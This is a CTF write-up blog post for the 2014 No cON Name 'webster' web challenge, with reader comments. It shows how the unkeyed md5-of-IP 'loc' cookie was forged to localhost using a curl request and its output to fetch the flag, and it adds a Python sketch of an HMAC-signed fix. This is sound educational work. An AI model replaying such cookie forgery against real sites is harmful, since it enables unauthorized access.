This year the «No cON Name Capture The Flag» quals had more than three challenges to compete for the final, so big thanks to the organizers for extending last year's limit. As of now (09:27 am GMT+2), @DefCon-UA (the dcua team) has finished all the challenges with 12+ hours still left before the competition ends. So it's time to draft some web write-ups.
The first web challenge, «webster» (200 points), shows us a login form. After multiple SQLi, XPath, LDAP… injection attempts with no luck, we tried logging in with common accounts.
Username 'test' and password 'test' was the lucky combination that gave access to the main private area.
We see id, filename, location and username for 4 files, and Captain Obvious says flag.txt is our target. But not so fast: something is blocking our attempts to read this file. It says:
"Seems that you are not in the right place for that"
So I'm not in the right place? Where could we go to get permission on that file? Look at the cookies, paying close attention to the one called 'loc':
Oh! It looks like an MD5 of something we couldn't identify on our first try. But wait, maybe location means IP? Let's try with the one that appears in the column:
>>> import hashlib
>>> ip = '10.128.29.136'
>>> hashlib.md5(ip).hexdigest()
'c869d000ef5c6fdfa128b058d2865512'
Yes! It's the same IP in hashed form, so can you figure out the rest? Let's replace this cookie with the hash of the 127.0.0.1 location (f528764d624db129b32c21fbca0cb8d6).
$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
* Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000
NCN_f528764d624db129b32c21fbca0cb8d6
flag: NCN_f528764d624db129b32c21fbca0cb8d6
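As an added illustration (not code from this write-up or from the challenge itself), here is the weak check the 'loc' cookie implies, an unkeyed md5 of the client IP that anyone can recompute, beside a keyed variant that binds the location claim to a server secret and the session. The HMAC cookie layout, the SERVER_KEY and the 'sess-1' session id are assumptions for the demo.

```python
import hashlib
import hmac
import os

# Constructed re-creation of the challenge's weak design: the 'loc' cookie is
# md5(client IP) with no secret, so the value for any address is computable.
def weak_loc_cookie(ip: str) -> str:
    return hashlib.md5(ip.encode()).hexdigest()

def weak_check(loc_cookie: str, allowed_ip: str = "127.0.0.1") -> bool:
    # The server only compares the cookie against the unkeyed hash of the
    # privileged address; a correct guess of that address is enough.
    return loc_cookie == weak_loc_cookie(allowed_ip)

# Hardened variant (assumed design, not the challenge's): the cookie carries
# "<ip>.<hmac>" where the MAC covers the session id and the IP under a key
# only the server holds, so the IP field cannot be changed without the key.
SERVER_KEY = os.urandom(32)  # in practice: loaded from protected config

def _mac(session_id: str, ip: str, key: bytes) -> str:
    return hmac.new(key, f"{session_id}|{ip}".encode(), hashlib.sha256).hexdigest()

def signed_loc_cookie(ip: str, session_id: str, key: bytes = SERVER_KEY) -> str:
    return f"{ip}.{_mac(session_id, ip, key)}"

def strong_check(loc_cookie: str, session_id: str,
                 allowed_ip: str = "127.0.0.1", key: bytes = SERVER_KEY) -> bool:
    ip, sep, mac = loc_cookie.rpartition(".")
    if not sep:
        return False  # malformed cookie
    # Constant-time comparison of the MAC, then the authorization decision.
    return hmac.compare_digest(mac, _mac(session_id, ip, key)) and ip == allowed_ip

if __name__ == "__main__":
    forged = weak_loc_cookie("127.0.0.1")
    print(forged, weak_check(forged))  # unkeyed hash: accepted
    good = signed_loc_cookie("127.0.0.1", "sess-1")
    print(strong_check(good, "sess-1"))  # issued by the server: accepted
    # Same IP field glued onto a MAC minted for another address: rejected.
    tampered = "127.0.0.1." + signed_loc_cookie("10.128.29.136", "sess-1").rpartition(".")[2]
    print(strong_check(tampered, "sess-1"))
```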
PS: Thanks to my dcua team mates.
Longinos Recuero Bustos
September 15, 2014
An excellent explanation. Best impossible!
See you soon!!
tunelko
September 15, 2014
Thanks :)
dook
September 15, 2014
Awesome! Been searching for some writeups from NCN, yours is the best so far. Nice detail, screenshots and explains it well.
Many Thanks
And congrats to your team! :)
tunelko
September 15, 2014
I'm sure more writeups will be published. What team are you?
Thanks for your comments!